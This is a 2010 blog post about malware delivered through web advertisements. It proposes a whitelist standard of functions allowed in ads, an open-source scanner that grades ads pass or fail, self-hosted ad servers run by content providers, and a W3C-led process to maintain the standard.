Friday, March 26, 2010

Save the web content providers

Web content is funded by advertisements.  But the advertisements often contain malware--everything from relatively benign tracking cookies (that only invade your privacy from afar, like binoculars looking into your bedroom window) to very dangerous keyloggers (that actively attempt to steal your passwords, identity, and money.)

CNET recently reported on a study by Avast, an anti-virus company, that showed a handful of major news sites were responsible for more than a hundred thousand malware infections in a week.  Savvy internet users are wising up and blocking the advertisements, with products like AdBlock Plus (which reports more than 75 million downloads.)  Content providers are experimenting with blocking AdBlock users from seeing content, and with moving away from advertising to a subscription model.

We need to figure out a way to flush the malware out of the advertising, so we can have revenue for the content producers and security for the content consumers.

I am proposing a solution to this problem.  It's not a simple solution.  But it is a robust solution that will scale and grow with the internet as technologies and tactics change.

There are several components to the solution.  There are technology changes.  There are process changes.  There are organizational changes.

Technologically, advertisements need to be reigned in.  Senior coders and software security experts need to meet and talk, and then define a standard of which functions and features may be used in advertisements.  This has to be broken down in specific terms on a language-by-language basis.  It will be easier to start with the assumption that all features and functions of all languages are banned until explicitly allowed.

The list of allowed functions will be quite short, I predict.  Any function that doesn't display or manipulate content within the browser will be excluded.  That list, however short or long, is the type of thing that we can programmatically enforce.  And I propose that we do exactly that.

We should build an open-source code-scanner program that quickly examines advertisements and provides a simple pass or fail grade.  Advertisement developers should plug this program into their source-code repository to ensure that they are obeying the standards.

The connection between web content providers and advertisement providers has to change, also.  Right now content providers hotlink the advertisements from the advertisement providers' servers.  That has to end.  Content providers have to take responsibility for the content that they are executing in their clients' browsers.  This means that content providers have to build advertisement servers in their networks, and advertisement providers have to submit their ads to the content providers for them to store and serve locally.  The open-source code checking program that we developed above must be connected to the content providers' advertisement stores.  Once an advertisement passes through that checkpoint the advertisers cannot touch it.

The advertisers will need some way to count impressions.  So among the approved functions (on the list above) there must be a method for the advertisement to call back to the advertisers' servers with some content to prove that the ad was served.  We will have to negotiate and determine exactly what content will be, but I would suggest the viewer's IP address and the URL of the page that served the ad.  And I would suggest that the advertisement gets to make one-and-only-one of these calls (this is also something that our scanner program can scan for.)

In order to build and maintain the list and program we have to get some interested parties together to talk.  This is the internet, so we can do much (or maybe all) of this electronically.  But I suspect that we will have to have an actual conference-type meeting or two.  We need to get three groups engaged: advertisers, content providers, and security experts.  This will have to be an ongoing program, where advertisers can petition to get more functions added to the allowed list and security experts can petition to get them removed.  And all three groups will want to code-review the scanner program, when it gets updated.  Therefore, I think that a group like W3C should host and manage the process.

Content providers who limit their advertisements to these scanned-and-approved types would be immune to products like AdBlock because the advertisements and content would come from the same server--AdBlock works by actively blocking the advertising companies' servers.

No comments:

Post a Comment